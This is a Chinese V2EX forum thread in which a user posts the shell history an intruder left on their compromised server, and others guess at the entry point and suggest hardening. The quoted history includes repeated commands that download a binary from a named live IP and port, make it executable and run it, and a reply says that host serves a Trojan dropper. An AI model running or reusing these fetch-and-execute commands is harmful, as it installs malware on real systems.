服务器连续两天被黑、第一次被挖矿、昨天又来、和第一次不同的是、居然有 history 记录、给各位老哥看看,只图一乐

2020-01-07 09:48:18 +08:00
 dothis

从 17:01 开始

为了防止上面图片挂掉、文本如下

21 2020-01-06 09:44:38 crontab -e

22 2020-01-06 09:45:16 reboot

23 2020-01-06 09:47:02 top

24 2020-01-06 17:01:03 top

25 2020-01-06 17:01:11 ls -l /proc/3557/exe

26 2020-01-06 17:01:17 netstat -atulnp

27 2020-01-06 17:01:40 ls -l /proc/1211/exe

28 2020-01-06 17:01:44 kill -9 1211

29 2020-01-06 17:01:46 crontab -l

30 2020-01-06 17:01:47 crontab -r

31 2020-01-06 17:01:48 crontab -l

32 2020-01-06 17:01:50 cd /usr/bin/

33 2020-01-06 17:01:57 rm -rf ftucwfvnpb

34 2020-01-06 17:02:00 netstat -atulnp

35 2020-01-06 17:02:03 w

36 2020-01-06 17:02:05 cd /root/

37 2020-01-06 17:02:07 cd /bin/

38 2020-01-06 17:02:15 wget http://101.201.76.232:8082/java

39 2020-01-06 17:02:19 rm -rf java.1

40 2020-01-06 17:02:20 cd /root/

41 2020-01-06 17:02:21 cd /opt/

42 2020-01-06 17:02:31 wget http://101.201.76.232:8082/java

43 2020-01-06 17:02:35 chmod 777 java

44 2020-01-06 17:02:36 ./java

45 2020-01-06 17:02:38 cd /root/

46 2020-01-06 17:02:41 ps -xua

47 2020-01-06 17:03:28 netstat -atulnp

48 2020-01-06 17:03:47 kill -9 4689

49 2020-01-06 17:03:51 netstat -atulnp

50 2020-01-06 17:04:02 cd /etc/

51 2020-01-06 17:04:11 kill -9 6161;kill -9 6163

52 2020-01-06 17:04:15 rm -rf java

53 2020-01-06 17:04:16 cd /root/

54 2020-01-06 17:04:17 cd /bin/

55 2020-01-06 17:04:22 wget http://101.201.76.232:8082/java

56 2020-01-06 17:04:28 rm -rf java.1

57 2020-01-06 17:04:30 cd /root/

58 2020-01-06 17:04:31 cd /opt/

59 2020-01-06 17:04:33 wget http://101.201.76.232:8082/java

60 2020-01-06 17:04:36 chmod 777 java

61 2020-01-06 17:04:39 ./java

62 2020-01-06 17:04:42 cd /root/

63 2020-01-06 17:04:44 netstat -atulnp

64 2020-01-06 17:04:51 ifconfig

65 2020-01-06 17:04:54 history

66 2020-01-06 17:05:01 netstat -atulnp

67 2020-01-06 17:05:42 cd /ro

68 2020-01-06 17:05:43 cd /root/

69 2020-01-06 17:05:46 history

70 2020-01-06 17:05:53 ifconfig

71 2020-01-06 17:05:54 history

72 2020-01-06 17:05:58 w

73 2020-01-06 17:06:00 history

74 2020-01-06 17:06:24 ifconfig

75 2020-01-06 17:06:27 history

76 2020-01-06 17:06:29 history

77 2020-01-06 17:06:29 history

24845 次点击
所在节点    程序员
66 条回复
dothis
2020-01-07 11:07:25 +08:00
@LengthMin @afirefish 是的、目前只是怀疑、因为时间上太巧了。

目前我本地服务器(linux):完全按照官方要求、开了对应的端口;使用了 ftp、mysql 这些;
公司服务器(windows):只是安装了宝塔、本地可以运行访问、外网 ip 和端口都没开、后来准备过两天用起来、就又把服务关闭了、隔天就中招
different
2020-01-07 11:10:10 +08:00
你也挺有意思,你的重点在于别人有多菜,而不是你的服务器怎么被别人黑进来了?
LengthMin
2020-01-07 11:14:48 +08:00
还有一个:之前看过一篇文章,因为宝塔里开启的 phpmyadmin 的 888 端口也是暴露在公网的,所以就怎么怎么怎么就进去 shell 了
dothis
2020-01-07 11:23:57 +08:00
@different 哈哈、老哥、我就是当一个笑话分享出来让大家一乐、我自己也很菜啊、不过感觉他的操作确实逗笑我了
原因有找过、不过就是因为我自己菜、没办法找到、不好意思、忘老哥谅解
公司服务器目前我只是反馈了一下我做了哪些操作、最终是由供应商去解决、也开会自我反省过了。

@LengthMin 多谢老哥、我去了解学习一下
opengps
2020-01-07 11:25:10 +08:00
公网环境就是这么恶劣,学学防御吧,最基本的:换端口,强密码,严格的防火墙
ZRS
2020-01-07 11:40:03 +08:00
怎么摸进来的
dorothyREN
2020-01-07 11:49:27 +08:00
我 sqlserver 1 号一大早被删库了。。。
shawshi
2020-01-07 12:02:51 +08:00
估计那个服务器还是肉鸡
shawshi
2020-01-07 12:03:03 +08:00
估计那个服务器也是肉鸡
AmosAlbert
2020-01-07 12:13:40 +08:00
看这操作,你的服务器成靶场了 :)
guanhui07
2020-01-07 12:26:21 +08:00
阿里云..
darknoll
2020-01-07 12:48:13 +08:00
不是通过密码登录进来的?
no1xsyzy
2020-01-07 12:49:16 +08:00
http://101.201.76.232:8082 的 “HFS” 页面里面是没有显示 /java 的
但 :80 带 Trojan-Dropper.VBS.Agent (卡巴斯基) 或者叫 TrojanDropper/Ramnit.f (火绒)
让我有点疑惑
直接报给 CNCERT 吧。
hiya5
2020-01-07 12:53:22 +08:00
他通过密码登录进来的吗
atonku
2020-01-07 13:21:23 +08:00
你黑不了他的服务器,所以你比他菜。
lostpg
2020-01-07 13:21:59 +08:00
感觉这是直接密码登 root 用户进来了,如果再是弱密码,不就是开着大门睡觉了。。。
dothis
2020-01-07 13:32:54 +08:00
@opengps 是的啊、经过这次事件、是要加强学习一下运维方面的知识了
@ZRS 不清楚、目前怀疑是因为宝塔、尝试找原因未找到
@dorothyREN 卧槽、你这比我更狠
@darknoll @hiya5 @lostpg 应该不是、我的密码很复杂
@atonku 哈哈、 有道理。我收回之之前他比我菜的话。
Mogugugugu
2020-01-07 13:52:03 +08:00
http://101.201.76.232 是个 nginx 页面,用的是 tomcat 的 fav.ico , 然后右键看一下源码、有意思、
puzzle9
2020-01-07 14:17:48 +08:00
@Mogugugugu 确实有意思 不过这种病毒对现代浏览器应该失效了把
xmi
2020-01-07 14:23:37 +08:00
@Pzqqt 我的也报毒了, 但是直接给放行了是什么情况? 有没有问题的?

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/635675

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX